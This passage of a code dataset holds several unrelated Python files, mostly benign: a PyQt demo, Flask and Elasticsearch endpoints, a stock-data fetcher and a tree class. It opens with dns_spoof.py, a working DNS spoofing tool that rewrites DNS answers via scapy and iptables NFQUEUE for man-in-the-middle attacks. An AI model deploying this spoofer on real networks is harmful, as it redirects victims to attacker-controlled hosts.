parser.error(\"[-] Queue number must be of type(int), use --help for more info.\")\n return options\n\n# main function\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload()) # convert payload into a scapy packet\n if scapy_packet.haslayer(scapy.DNSRR): # check if packet has a dns response layer\n qname = scapy_packet[scapy.DNSQR].qname.decode(\"utf-8\")\n if target_website in qname:\n print(\"[+] Spoofing target\")\n answer = scapy.DNSRR(rrname=qname, rdata=modified_ip) # create a dns response, keep the name, change the ip to the prefered one\n scapy_packet[scapy.DNS].an = answer # modify the answer of the packet\n scapy_packet[scapy.DNS].ancount = 1 # modify the number of answers of the packet\n\n # remove variables that would corrupt the modified packet, scapy will auto redefine them\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].chksum\n del scapy_packet[scapy.UDP].len\n\n packet.set_payload(bytes(scapy_packet)) # change the original 
payload of the packet with the modified one\n packet.accept() # allow forwarding the packet to it's destination\n # packet.drop() # deny forwarding the packet to it's destination\n\n\noptions = get_arguments()\ntarget_website = options.target # globally set\nmodified_ip = options.ip # globally set\nqueue_num = options.queue_num\n\nif int(options.preference):\n # To run this as man in the middle\n # !! DISCLAIMER: This app doesn't create a man in the middle, you need an arp spoofer running !!\n subprocess.run([\"iptables\", \"-I\", \"FORWARD\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\nelse:\n # To run this locally\n subprocess.run([\"iptables\", \"-I\", \"OUTPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\n subprocess.run([\"iptables\", \"-I\", \"INPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\n\nqueue = netfilterqueue.NetfilterQueue() # object creation\nqueue.bind(int(queue_num), process_packet) # connect to an existed queue\n\ntry:\n queue.run()\nexcept KeyboardInterrupt:\n print(\"\\n[!] Detected CTRL + C ... FlUSHING IPTABLES...\")\n subprocess.run([\"iptables\", \"--flush\"])\n print(\"[+] Done.\")\n","sub_path":"dns_spoof.py","file_name":"dns_spoof.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"437092942","text":"import random\nimport sys\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QPainter, QPixmap, QColor\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\nfrom Ui import Ui_MainWindow\n\n\nclass MyWidget(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pixmap = QPixmap(self.width(), self.height())\n self.pixmap.fill(QColor(255, 255, 255))\n self.pushButton.clicked.connect(self.run)\n\n def run(self):\n qp = QPainter(self.pixmap)\n qp.setBrush(QColor(random.randint(0, 255),\n random.randint(0, 255),\n random.randint(0, 255)))\n qp.drawEllipse(random.randint(0, self.width() - 50),\n random.randint(0, self.height() - 50),\n random.randint(15, 50),\n random.randint(15, 50))\n self.update()\n\n def paintEvent(self, e):\n qp = QPainter(self)\n qp.drawPixmap(0, 0, self.pixmap)\n\n\napp = QApplication(sys.argv)\nex = MyWidget()\nex.show()\nsys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97313189","text":"# !/bin/python3\r\n\r\nimport os\r\nimport sys\r\nimport inspect\r\n\r\n\r\ndef read_input(val_type=None, separator=None, ignore_empty=True):\r\n if len(sys.argv) > 1:\r\n fname = sys.argv[1]\r\n if not os.path.exists(fname):\r\n if len(sys.argv) == 2:\r\n if val_type:\r\n return val_type(sys.argv[1])\r\n return sys.argv[1]\r\n if val_type:\r\n return [val_type(value) for value in sys.argv[1:]]\r\n return sys.argv[1:]\r\n else:\r\n frame = inspect.stack()[1]\r\n module = inspect.getmodule(frame[0])\r\n fname = '{0}input.txt'.format(os.path.splitext(module.__file__)[0])\r\n\r\n if not os.path.exists(fname):\r\n return\r\n\r\n with open(fname) as f:\r\n inp = []\r\n for line in f.readlines():\r\n if ignore_empty:\r\n line = line.strip()\r\n else:\r\n line = line.replace('\\n', '').replace('\\r', '')\r\n if separator:\r\n values = line.split(separator)\r\n else:\r\n values = line\r\n\r\n if val_type:\r\n if type(values) is list:\r\n values = [val_type(value) for value in values]\r\n else:\r\n values = [val_type(values)]\r\n\r\n if 
len(values) == 1:\r\n values = values[0]\r\n\r\n inp.append(values)\r\n\r\n if len(inp) == 1:\r\n return inp[0]\r\n return inp\r\n","sub_path":"advent_of_code/2017/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"396202434","text":"#!/usr/bin/env python3\n \nimport argparse\nimport pandas as pd\n\nparser = argparse.ArgumentParser( description = \"Modify Treemix modelcov matrix for hapFLK input.\" )\nparser.add_argument(\"infile\", type = str, help = \"Treemix modelcov matrix\")\nparser.add_argument(\"outfile\", type=str, help = \"Output modelcov hapFLK compatible matrix (gzip compressed).\")\nparser.add_argument(\"--outgroup\", type=str, help= \"Outgroup name to remove\", default = \"p1\")\nargs = parser.parse_args()\n\ninfile = args.infile\noutfile = args.outfile\noutgroup = args.outgroup\n\n# read matrix\nm = pd.read_csv(infile, sep = \" \",skiprows=1, header = None)\n# get population names column\ncols = [\"pop\"]\ncols.extend(list(m[0]))\nm.columns = cols \n# modify df\nm = m.set_index(m[\"pop\"])\nm = m.drop(\"pop\", axis = 1 )\n# drop outgroup\nm = m.drop(outgroup,axis = 0).drop(outgroup, axis = 1 )\n# write\nm.to_csv(outfile,sep = \" \", header = False, index = True,index_label = False)\n\n\n\n\n\n\n","sub_path":"bin/prepare-modelcov.py","file_name":"prepare-modelcov.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369017549","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\n\nclass tree:\n #constructor\n def __init__(self, name_):\n self.name = name_\n self.name2 = ''\n self.children = []\n self.range = []\n\n #copy constructor\n def copy(self, Tree):\n self.name = Tree.name\n if Tree.is_leaf() == True:\n return\n else:\n for i in range(len(Tree.children)):\n self.children.append(tree('temp_name'))\n self.children[i].copy(Tree.children[i])\n\n #go to a certain Node from the beginning\n def getTo(self, path):\n temp = self\n for p in path:\n for i in range(len(temp.children)):\n if temp.children[i].name == p:\n temp = temp.children[i]\n break\n if temp.name != path[-1]:\n print(\"Path does not exist\")\n return None\n return temp\n\n \n #add a leaf under current tree\n def add_child(self, name):\n temp = tree(name)\n self.children.append(temp)\n\n\n #add a leaf under certain node\n #@parent: list of parent \n def add(self, name_, parents):\n temp = self\n temp = self.getTo(parents)\n if temp != None:\n temp.add_child(name_) \n else:\n return None\n \n\n\n #add multiple leaf under all current leaf nodes\n #@names: list of nodes' name to be added\n def add_multiples(self, names):\n if self.is_leaf() == True:\n for name in names:\n temp = tree(name)\n self.children.append(temp)\n return\n for i in range(len(self.children)):\n self.children[i].add_multiples(names)\n \n #add multiple trees under all current leaf nodes\n #@trees: list of trees' name to be added\n def connect(self, trees):\n if self.is_leaf() == True:\n for Tree in trees:\n tempTree = tree('temp_name')\n tempTree.copy(Tree)\n self.children.append(tempTree)\n return\n for i in range(len(self.children)):\n self.children[i].connect(trees)\n\n #determine if current node is leaf \n def is_leaf(self):\n if len(self.children) == 0:\n return True\n else:\n return False\n\n\n #add range for leaves\n def addLeafRange(self, range_):\n if self.is_leaf() == True:\n self.range = 
range_.copy()\n else:\n print(\"Not a leaf, error\")\n return\n\n\n #add range for branches\n def addbranchRange(self):\n if self.is_leaf() == False:\n self.range = [self.FindLow(), self.FindHigh()]\n else:\n print(\"Not a branch, error\")\n return\n\n def FindLow(self):\n if self.is_leaf() == True:\n return self.range[0]\n return self.children[0].FindLow()\n\n def FindHigh(self):\n if self.is_leaf() == True:\n return self.range[-1]\n return self.children[-1].FindHigh()\n\n\n #add all the range \n #call after all the nodes have been added\n def add_range(self):\n curr_index = [0]\n self.traversal1(curr_index)\n self.traversal2()\n return\n\n def traversal1(self, curr_index):\n if self.is_leaf() == True:\n self.addLeafRange([curr_index[-1], curr_index[-1] + 1])\n return curr_index.append(curr_index[-1] + 1)\n for i in range(len(self.children)):\n self.children[i].traversal1(curr_index)\n return\n\n def traversal2(self):\n if self.is_leaf() == True:\n return\n self.addbranchRange()\n for i in range(len(self.children)):\n self.children[i].traversal2()\n \n #obtain all the leaf nodes\n def getLeaves(self):\n leaves = []\n self.getLeaves_helper(leaves)\n return leaves\n\n def getLeaves_helper(self, leaves):\n if self.is_leaf() == True:\n leaves.append(self)\n return\n for i in range(len(self.children)):\n self.children[i].getLeaves_helper(leaves)\n return\n\n #print the tree\n def printTree(self):\n '''\n print()\n print(self.name, \": \", end = '' )\n for i in range(len(self.children)):\n print(self.children[i].name, ', ', end = '')\n '''\n print(self.name, \" \", self.range)\n for i in range(len(self.children)):\n self.children[i].printTree()\n return\n \n #count number of nodes\n def count(self):\n if self.is_leaf() == True:\n return 1\n total = 1\n for i in range(len(self.children)):\n total += self.children[i].count()\n return total\n \n def countleaves(self):\n if self.is_leaf() == True:\n return 1\n total = 0\n for i in range(len(self.children)):\n total += self.children[i].countleaves()\n return total\n\n\n #Change structure of the tree from list to dictionary to improve runtime \n def to_dict(self):\n temp = {}\n for i in range(len(self.children)):\n temp[self.children[i].name] = self.children[i]\n if self.is_leaf() == False:\n self.children[i].to_dict()\n self.children = temp\n \n #go to a certain node from the beginning after turning into dictionary\n def getTod(self, path):\n temp = self\n for p in path[1::]:\n try:\n temp = temp.children[p]\n except BaseException:\n print('Path does not exist')\n return None\n return temp\n","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"558176974","text":"print('INITIALIZING')\nimport time\nimport socket\n\nimport sys\nimport select\nimport time\nimport threading\nimport queue\n\nread_list = [sys.stdin]\ntimeout = 0.1 # seconds\nlast_work_time = time.time()\n\nprint('1')\ntime.sleep(2)\nprint('2')\ntime.sleep(2)\nprint('3')\ntime.sleep(2)\nprint('INITIALIZING_SERVER')\ns = socket.socket()\nai = socket.getaddrinfo(\"10.0.100.13\",8080)[0][-1]\ns.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\ns.bind(ai)\ns.listen(1)\ncounter = 0\nwhile True:\n res = s.accept()\n client_s = res[0]\n client_addr = res[1]\n print('WAITING_FOR_CLIENT_COMMAND')\n req = client_s.recv(4096)\n print('CLIENT_SENT')\n print(req.decode('ascii'))\n time.sleep(2)\n a = input()\n print(a)\n client_s.send('ASW=' + a +'');\n 
client_s.close()\n counter += 1\n\n\ndef something(line):\n print('read input:', line, end='')\n\ndef something_else():\n print('no input')\n","sub_path":"esp-micropython/main-1.py","file_name":"main-1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"225258932","text":"# Do not modify these lines\r\n__winc_id__ = '7b9401ad7f544be2a23321292dd61cb6'\r\n__human_name__ = 'arguments'\r\n\r\n# Add your code after this line\r\ndef greet(name='name', greeting='Hello, <name>!'):\r\n replace_name = greeting.replace('<name>',name)\r\n return replace_name\r\n\r\n\r\ndef force(mass=1, body='earth'):\r\n planets= {'sun':274,\r\n 'jupiter':24.9,\r\n 'neptune':11.2,\r\n 'saturn':10.4,\r\n 'earth':9.8,\r\n 'uranus':8.9,\r\n 'venus':8.9,\r\n 'mars':3.7,\r\n 'mercury':3.7,\r\n 'moon':1.6,\r\n 'pluto':0.6\r\n }\r\n return round(float((mass) * (planets[body])),1)\r\n\r\ndef pull(m1,m2,d):\r\n return (6.674*(10**-11)) * ((m1*m2)/d**2)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"9083364","text":"#pip install yfinance\nimport yfinance as yf\nimport pandas as pd\nimport datetime as dt\n\ndef get_ticker():\n return input()\n\ndef get_ticker_data(ticker):\n the_ticker = yf.Ticker(ticker)\n hist = the_ticker.history(period=\"2y\")\n hist = hist.reset_index()\n #type(hist) #pandas dataframe\n df_Stock = pd.DataFrame()\n df_Stock = df_Stock.assign(Close = hist['Close'].values)\n df_Stock = df_Stock.assign(Date = hist['Date'].values)\n return df_Stock\n\ndef date_split(date):\n #input is in the form of '2020-04-27'\n date = date.split('-')\n next_date = dt.date(int(date[0]), int(date[1]), int(date[2]))\n return next_date\n\ndef date_string(date):\n #input is a datetime object\n return date.strftime(\"%Y-%m-%d\")\n\ndef get_start_date(df):\n #gets the first monday\n bool = True\n i = 0\n while bool:\n start_date = date_string(df['Date'][i])\n date_list = start_date.split('-')\n if dt.date(int(date_list[0]), int(date_list[1]), int(date_list[2])).weekday() == 0:\n bool = False\n print(start_date)\n return start_date\n else:\n i += 1\n\ndef get_weekly_data(df, start_date, ticker):\n df_week = pd.DataFrame()\n test_list = []\n next_date = start_date\n test_list.append(next_date)\n while df['Date'][len(df)-1] >= date_split(next_date):\n next_date = date_split(next_date) + dt.timedelta(days = 7)\n next_date = date_string(next_date)\n test_list.append(next_date)\n\n test_list.pop(-1)\n for i in range(len(test_list)):\n df_week = df_week.append(df.loc[df['Date'] == test_list[i]])\n price = ticker+' Closing price'\n time = ticker+' Date'\n df_week = df_week.rename(columns = {'Close': price, 'Date': time})\n return df_week\n\ndef get_stock_inputs():\n number = input() # max idk\n number = int(number)\n ticker_list = []\n for i in range(1, number+1):\n ticker_list.append(input())\n i += 1\n return ticker_list\n\ndef get_stock_data(ticker_list):\n df_final = pd.DataFrame()\n for i in range(len(ticker_list)):\n try:\n data = get_ticker_data(ticker_list[i])\n date1 = get_start_date(data)\n df = get_weekly_data(data, date1, ticker_list[i])\n except (KeyError, IndexError) as e:\n continue\n df_final = pd.concat([df_final, df], axis = 1)\n if i != 0:\n #print(df_final[ticker_list[i]+' Date'].tolist() == df_final[ticker_list[0]+' Date'].tolist())\n if df_final[ticker_list[i]+' Date'].tolist() == 
df_final[ticker_list[0]+' Date'].tolist():\n df_final = df_final.drop(ticker_list[i]+ ' Date', axis = 1)\n cols = df_final.columns.tolist()\n index = cols[1]\n cols.remove(ticker_list[0]+' Date')\n cols.append(index)\n df_final = df_final[cols]\n df_final = df_final.rename(columns={ticker_list[0]+' Date': 'Date'})\n return df_final\n\n\ndef s_turn_to_csv(df):\n df.to_csv('stock.csv', index = False)\n\n#test implementation\ntest = get_stock_inputs()\ndf = get_stock_data(test)\ns_turn_to_csv(df)\n\n#random_ticker implementation\ndatapath = f\"D://work/stonks/random_tickers.csv\"\ndata = pd.read_csv(datapath)\nthe_list = data.values.tolist()\nlist_ = []\nfor i in range(len(the_list)):\n list_.append(the_list[i][0])\ntickers_df = get_stock_data(list_)\ns_turn_to_csv(tickers_df)\n","sub_path":"stock_api.py","file_name":"stock_api.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379652853","text":"from flask import Blueprint, jsonify, request\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.query import MultiMatch, Match\nfrom reddit.errors import InvalidUsage\n\n\nbp = Blueprint(\"search\", __name__, url_prefix=\"/api/v1/search\")\n\n\n@bp.route('', methods=['GET'])\ndef search():\n try:\n query = request.args['q']\n except KeyError as ex:\n raise InvalidUsage.validation_error()\n \n search = Search(index='threads')\n search.query = MultiMatch(query=query, fields=['title', 'body', 'description'])\n response = search.execute()\n return jsonify(response.to_dict())\n","sub_path":"reddit/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108881057","text":"from typing import List\n\n#define the Solution class\nclass Solution:\n #define twoSum() method in which two methods of having these must type and return list of int.\n def twoSum(self,nums:List[int],target : int) -> List[int]: \n for i in range(0,len(nums)):\n for j in range(0,len(nums)):\n if (nums[i]+nums[j] == target) and (i < j):\n return list((i,j))\nprint(Solution().twoSum([2,4,5,6,9],9))\n","sub_path":"two-sum/Solve.py","file_name":"Solve.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157278677","text":"from flask import Blueprint, render_template, request, current_app\nfrom jobplus.models import Job\nfrom datetime import datetime\n\n\n\njob = Blueprint('job', __name__, url_prefix='/job')\n\n\n@job.route('/')\ndef index():\n page = request.args.get('page',default=1, type=int)\n pagination = Job.query.paginate(\n page=page,\n per_page=current_app.config['JOBINDEX_PER_PAGE'],\n error_out=False\n )\n\n\n return render_template('job/index.html', pagination=pagination)\n","sub_path":"jobplus/handlers/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205136140","text":"from flask import Flask\nimport yaml\nimport json\n\napp = Flask(__name__)\n\ndef merge_two_dicts(x, y):\n z = x.copy()\n z.update(y)\n return z\n\ndef create_hal_object(id, object):\n halified = {\n 'id': id,\n \"_links\": {\n \"self\": { \"href\": \"/laptimes/\"+id },\n \"tracks\": { \"href\": \"/tracks/\"+id }\n }\n }\n return merge_two_dicts(halified, object)\n\n@app.route(\"/laptimes/\")\ndef laptimes(id):\n 
config = yaml.load(open('laptimes.yml'))\n return json.dumps(create_hal_object(str(id), config['laptimes'][str(id)]))\n\napp.run(host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473404125","text":"import numpy as np\nnp.random.seed(1337)\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense,Input\nimport matplotlib.pyplot as plt\n\n(x_train,_),(x_test,y_test)=mnist.load_data()\n\nx_train=x_train.astype('float32')/255.-0.5\nx_test=x_test.astype('float32')/255.-0.5\nx_train=x_train.reshape((x_train.shape[0],-1))\nx_test=x_test.reshape((x_test.shape[0],-1))\nprint(x_train.shape)\nprint(x_test.shape)\n\nencoding_dim=2\ninput_img=Input((784,))\n#encode_layers\nencoded=Dense(128,activation='relu')(input_img) #后面括号是输入,这里是压缩层\nencoded=Dense(64,activation='relu')(encoded)\nencoded=Dense(10,activation='relu')(encoded)\nencoder_output=Dense(encoding_dim,)(encoded)\n#decoder layers\ndecoded=Dense(10,activation='relu')(encoder_output)\ndecoded=Dense(64,activation='relu')(decoded)\ndecoded=Dense(128,activation='relu')(decoded)\ndecoded=Dense(784,activation='tanh')(decoded)\n#组建autoencoder\nautoencoder=Model(input=input_img,outputs=decoded)\n#组建单独的encoder\nencoder=Model(inputs=input_img,outputs=encoder_output)\nautoencoder.compile(optimizer='adam',loss='mse')\n#training\nautoencoder.fit(x_train,x_train,nb_epoch=50,batch_size=256,shuffle=True) #压缩解压同一数据对比结果\n#plotting\nencoded_imgs=encoder.predict(x_test)\nplt.scatter(encoded_imgs[:,0],encoded_imgs[:,1],c=y_test)\nplt.show()\n","sub_path":"CODE/AutoEncoder.py","file_name":"AutoEncoder.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"370711842","text":"from copy import deepcopy\n\nfrom flask import jsonify, request\n\nfrom server.app import app\nfrom server.app import db\nfrom server.models import Shop, Mall\nfrom flask_cors import cross_origin\n\n\ndef convert_shops_to_dict(shops: list) -> list:\n row = []\n for shop in shops:\n dict_shop = {\n 'id': shop.id,\n 'Type': shop.Type,\n 'Name': shop.Name,\n 'City': '',\n 'Mall': '',\n 'District': '',\n }\n if not shop.malls:\n row.append(dict_shop)\n else:\n for mall in shop.malls:\n temp_shop = deepcopy(dict_shop)\n temp_shop['City'] = mall.City\n temp_shop['Mall'] = mall.Name\n temp_shop['District'] = mall.District\n row.append(temp_shop)\n\n return row\n\n\ndef convert_malls_to_dict(malls):\n row = []\n for mall in malls:\n appended = False\n temp_mall = {\n 'id': mall.id,\n 'Name': mall.Name,\n 'City': mall.City,\n 'District': mall.District,\n 'Shop': '',\n }\n # row.append(temp_mall)\n # if not mall.shops:\n # row.append(temp_mall)\n # else:\n\n temp_shop = deepcopy(temp_mall)\n for shop in mall.shops:\n temp_shop = deepcopy(temp_mall)\n temp_shop['Shop'] = shop.Name\n row.append(temp_shop)\n appended = True\n\n if not appended:\n row.append(temp_shop)\n # appended = False\n\n return row\n\n\n@app.route('/shops', methods=['GET', 'POST'])\ndef all_shops():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n # SHOPS.append({\n # 'id': post_data.get('id'),\n # 'Mall': post_data.get('Mall'),\n # 'Type': post_data.get('Type'),\n # 'Name': post_data.get('Name'),\n # 'City': post_data.get('City'),\n # 'District': post_data.get('District')\n # })\n shop = 
Shop.query.filter_by(Name=post_data.get('Name')).first()\n if shop is None:\n\n shop = Shop(\n Type=post_data.get('Type'),\n Name=post_data.get('Name'),\n )\n db.session.add(shop)\n\n mall = Mall.query.filter_by(Name=post_data.get('Mall')).first()\n if mall is None:\n mall = Mall(\n Name=post_data.get('Mall'),\n City=post_data.get('City'),\n District=post_data.get('District')\n )\n db.session.add(mall)\n repeated_mall = list(filter(lambda mall: mall.Name == post_data.get('Mall'), shop.malls))\n if not(repeated_mall):\n shop.malls.append(mall)\n db.session.add(shop)\n db.session.add(mall)\n db.session.commit()\n response_object['message'] = 'Shop added!'\n else:\n response_object['message'] = 'Shop is already in the mall!'\n else:\n shops = Shop.query.all()\n row = convert_shops_to_dict(shops)\n\n return jsonify({\n 'status': 'success',\n 'shops': row\n })\n\n\ndef remove_shop(shop_id, mall_id):\n # db.session.query(Shop).filter(Shop.id == shop_id).delete()\n shop_to_remove = Shop.query.filter(Shop.id == shop_id).first()\n if (not shop_to_remove.malls and mall_id == \"empty\") or len(shop_to_remove.malls) == 1:\n db.session.query(Shop).filter(Shop.id == shop_id).delete()\n else:\n for mall in shop_to_remove.malls:\n if mall.Name == mall_id:\n shop_to_remove.malls.remove(mall)\n break\n db.session.commit()\n\n\ndef remove_malls(mall_id):\n db.session.query(Mall).filter(Mall.id == mall_id).delete()\n db.session.commit()\n\n\n@app.route('/shops/<shop_id>/<mall_id>', methods=['PUT', 'DELETE', 'OPTIONS'])\ndef single_shop(shop_id, mall_id):\n response_object = {\n 'status': 'success',\n 'message': 'Shop updated!'\n }\n if request.method == 'PUT':\n post_data = request.get_json()\n # remove_shop(shop_id)\n mall = Mall.query.filter_by(Name=post_data.get('Mall')).first()\n\n # shop = Shop.query.filter_by(Name=post_data.get('Name')).first()\n\n shop_by_id = Shop.query.filter_by(id=shop_id).first()\n if shop_by_id.Name == post_data.get('Name'):\n shop_by_id.Type = post_data.get('Type')\n else:\n shop_by_id.Type = post_data.get('Type')\n shop_by_id.Name = post_data.get('Name')\n\n repeated_mall = list(filter(lambda mall_: mall_.Name == post_data.get('Mall'), shop_by_id.malls))\n if not repeated_mall:\n response_object['message'] = 'Shop was not updated!'\n for mall_in_shop in shop_by_id.malls:\n if mall_in_shop.Name == mall_id:\n shop_by_id.malls.remove(mall_in_shop)\n if mall is None:\n mall = Mall(\n Name=post_data.get('Mall'),\n City=post_data.get('City'),\n District=post_data.get('District')\n )\n # db.session.add(mall)\n else:\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n db.session.add(mall)\n shop_by_id.malls.append(mall)\n db.session.add(shop_by_id)\n\n # db.session.add(shop_by_id)\n db.session.commit()\n # remove_shop(shop_id)\n response_object['message'] = 'Shop updated!'\n else:\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n response_object['message'] = 'Shop was not updated!'\n db.session.add(shop_by_id)\n db.session.commit()\n if request.method == 'DELETE':\n remove_shop(shop_id, mall_id)\n response_object['message'] = 'Shop removed!'\n return jsonify(response_object)\n\n\n@app.route('/malls', methods=['GET', 'POST'])\ndef all_malls():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n mall = Mall.query.filter_by(Name=post_data.get('Name')).first()\n if mall is None:\n mall = Mall(\n Name=post_data.get('Name'),\n City=post_data.get('City'),\n District=post_data.get('District')\n 
)\n db.session.add(mall)\n db.session.commit()\n response_object['message'] = 'Mall added!'\n else:\n malls = Mall.query.all()\n row = convert_malls_to_dict(malls)\n\n return jsonify({\n 'status': 'success',\n 'malls': row\n })\n\n\n@app.route('/malls/<mall_id>', methods=['PUT', 'DELETE'])\ndef single_mall(mall_id):\n response_object = {\n 'status': 'success',\n 'message': 'Mall updated!'\n }\n if request.method == 'PUT':\n post_data = request.get_json()\n mall = Mall.query.filter_by(id=mall_id).first()\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n mall.Name = post_data.get('Name')\n db.session.add(mall)\n db.session.commit()\n if request.method == 'DELETE':\n remove_malls(mall_id)\n response_object['message'] = 'Mall removed!'\n return jsonify(response_object)\n\n\n@app.route('/ping', methods=['GET'])\ndef ping_pong():\n return jsonify('pong!')\n","sub_path":"lab3/server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"608596977","text":"from FCS import Fcs\nfrom tkinter import filedialog\nimport os\nimport re\nfrom tkinter import Tk\n\n# Choose the working directory\nroot = Tk()\nroot.withdraw()\nFpath = filedialog.askdirectory()\n\n# Read the panel sheet info\npanel_file = Fpath + \"/panel.xlsx\"\npanel_tuple = Fcs.export_panel_tuple(panel_file)\nprint(panel_tuple)\n\nfor filename in [filename for filename in os.listdir(Fpath) if os.path.splitext(filename)[1] == \".fcs\"]:\n file = Fpath + '/' + filename\n fcs = Fcs(file)\n\n\n pars = fcs.delete_channel(fcs.pars, 89, 115, 140, 115)\n # pars = fcs.marker_rename(fcs.pars, *panel_tuple)\n # stain_channel_index = fcs.get_stain_channels(pars)\n #\n # # Add event_length, 191, 193, 194, 140\n # add_channel = [\"Event_length\", \"Ir191Di\", \"Ir193Di\", \"Pt194Di\", \"Ce140Di\"]\n # add_index = [i + 1 for i in range(0, len(pars)) if pars[i].par_short_name in add_channel]\n # stain_channel_index.extend(add_index)\n # pars = [pars[i] for i in range(0, len(pars)) if i + 1 in stain_channel_index]\n\n # Look up the new name based on the current filename\n new_filename = re.sub(\"-\", \"\", filename)\n # new_filename = re.sub(\"^.+?_\", \"gsH_\", new_filename)\n new_file = Fpath + \"/WriteFcs/\" + new_filename\n\n fcs.write_to(new_file, pars)\n","sub_path":"FCS5/fcs_rename_3.py","file_name":"fcs_rename_3.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"279753873","text":"import mts_cache_algorithm\r\nimport operator \r\nimport time\r\nimport sys\r\ntrace = open(\"trace.result\", \"a\")\r\n# def load_file(filename, alg, periodSize=10**5, throt=500, watch=1, predict=5):\r\n# \ti = 0\r\n# \treadReq = 0\r\n# \tperiod = 1\r\n# \tstatus = \"watch\"\r\n# \twatchDict = {}\r\n# \tpredictDict = {}\r\n# \tssd = alg(throt)\r\n# \tfin = open(filename, 'r', encoding='utf-8', errors='ignore')\r\n# \tlines = fin.readlines()\r\n# \tlineNum = len(lines)\r\n# \tprint(filename, alg, periodSize, throt, watch, predict, file=trace)\r\n\t\r\n# \tfor line in lines:\r\n# \t\ti += 1\r\n# \t\t# print(readReq, period, watchDict, predictDict)\r\n# \t\titems = line.split(' ')\r\n# \t\treqtype = int(items[0])\r\n# \t\tblock = int(items[2])\r\n\r\n# \t\tif reqtype == 1:\r\n# \t\t\tcontinue\r\n\r\n# \t\treadReq += 1\r\n# \t\tif status == \"watch\":\r\n# \t\t\tssd.update_cache(block)\r\n# \t\t\twatchDict = recordReq(block, watchDict)\r\n# \t\telse:\r\n# \t\t\tpredictDict = recordReq(block, 
predictDict)\r\n\r\n# \t\tif readReq >= periodSize:\r\n# \t\t\t# print(\"period increase\", readReq, period)\r\n# \t\t\treadReq = 0\r\n# \t\t\tperiod += 1\r\n# \t\t\tif status == \"watch\" and (period%(watch+predict)) > watch:\r\n# \t\t\t\tstatus = \"predict\"\r\n# \t\t\telif status == \"predict\" and (period%(watch+predict)) == 1:\r\n# \t\t\t\toutputResult(watchDict, predictDict, ssd, period-1)\r\n# \t\t\t\tprint(i, \"************************************\", file=trace)\r\n# \t\t\t\tstatus = \"watch\"\r\n# \t\t\t\twatchDict = {}\r\n# \t\t\t\tpredictDict = {}\r\n# \t\t\t\tssd = alg(throt)\r\n# \t\t\telif status == \"predict\":\r\n# \t\t\t\toutputResult(watchDict, predictDict, ssd, period-1)\r\n# \t\t\t\tpredictDict = {}\r\n\r\n# \tfin.close()\r\n\r\ndef init_predictSize(throt):\r\n\tpredictSize = 100\r\n\twhile predictSize < throt:\r\n\t\tpredictSize = predictSize * 10\r\n\treturn predictSize\r\n\r\ndef load_file_time_window(filename, alg, periodSize=10**5, throt=500):\r\n\ti = 0\r\n\treadReq = 0\r\n\tperiod = 1\r\n\tstatus = \"watch\"\r\n\twatchDict = {}\r\n\tpredictDict = {}\r\n\tpredictSize = init_predictSize(throt)\r\n\tssd = alg(throt)\r\n\tfin = open(filename, 'r', encoding='utf-8', errors='ignore')\r\n\tlines = fin.readlines()\r\n\tlineNum = len(lines)\r\n\tprint(filename, 